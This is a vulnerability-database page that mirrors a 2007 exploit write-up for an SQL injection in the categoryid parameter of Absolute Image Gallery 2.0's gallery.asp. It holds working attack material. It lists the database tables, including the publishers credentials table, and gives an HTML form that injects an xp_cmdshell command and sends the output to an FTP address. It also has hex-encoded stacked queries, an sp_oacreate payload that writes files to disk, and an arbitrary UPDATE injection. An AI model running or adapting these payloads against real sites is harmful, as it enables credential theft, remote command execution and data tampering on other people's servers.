Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

aig-mssql.txt

🗓️ 20 Mar 2007 00:00:00Reported by UniquE-KeyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit. SQL Injection issue in Absolute Image Gallery product by Xigla on 2007-03-15. Lists various table names and their columns. Includes MSSQL CMD Injection Exploit for DBO Users.

Code
`Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit  
  
Type :  
  
SQL Injection  
  
Release Date :  
  
{2007-03-15}  
  
Product / Vendor :  
  
Absolute Image Gallery  
  
http://www.xigla.com/absoluteig/  
  
Bug :  
  
http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Script Table/Colon Name :   
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : articlefiles  
  
fileid  
filetitle  
filename  
articleid  
filetype  
filecomment  
urlfile  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : articles  
  
articleid  
posted  
lastupdate  
headline  
headlinedate  
startdate  
enddate  
source  
summary  
articleurl  
article  
status  
autoformat  
publisherid  
clicks  
editor  
relatedid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : iArticlesZones  
  
articleid  
zoneid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : plugins  
  
pluginid  
pplname  
pplfile  
ppldescription  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : PPL1reviews  
  
reviewid  
articleid  
name  
reviewdate  
review  
comments  
isannonymous  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : publishers  
  
publisherid  
name  
username  
password  
email  
additional  
plevel  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : publisherszones  
  
publisherid  
zoneid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGcategories  
  
categoryid  
catname  
catdesc  
supercatid  
lastupdate  
catpath  
images  
allowupload  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGimages  
  
imageid  
imagename  
imagedesc  
imagefile  
imagedate  
imagesize  
totalrating  
totalreviews  
hits  
categoryid  
status  
uploadedby  
additionalinfo  
embedhtml  
keywords  
copyright  
credit  
source  
datecreated  
email  
infourl  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGpostcards  
  
dateposted  
postcardid  
imageid  
bgcolor  
bordercolor  
fonttype  
fontcolor  
recipientname  
recipientemail  
greeting  
bgsound  
sendername  
senderemail  
sendermsg  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : zones  
  
zonename  
description  
template  
articlespz  
zonefont  
fontsize  
fontcolor  
showsource  
showsummary  
showdates  
showtn  
textalign  
displayhoriz  
cellcolor  
targetframe  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
MSSQL CMD Injection Exploit(For DBO Users) :  
  
<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>  
<body bgcolor="#000000">  
<form name="Form" method="get" action="http://localhost/script/gallery.asp">  
<center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>  
<center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center>  
<center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center>  
<tr>  
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>  
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>  
<td>&nbsp;</td>  
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>  
</tr>  
<tr>  
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>  
<td>&nbsp;</td>  
<td>  
<select name="">  
<option value="0">(CMD)</option>  
</select>&nbsp;<br><br>  
<input type="submit" value="Apply"></center>  
</td>  
</tr>  
</table>  
</form>  
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>  
<br>  
<font face="Verdana" size="2" color="#FF0000"><b>[email protected]</b></font>  
<br>  
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Code Injection(For DBO Users) :  
  
Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--  
  
ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--  
  
Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
UPDATE(ALL users) :  
  
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Tested :  
  
Absolute Image Gallery 2.0  
  
Vulnerable :  
  
Absolute Image Gallery 2.0  
  
Author :  
  
UniquE-Key{UniquE-Cracker}  
UniquE(at)UniquE-Key.Org  
http://www.UniquE-Key.Org  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
absolute image gallerymssql injectionxiglasql injectiontable namescolumnsexploitdbo users
18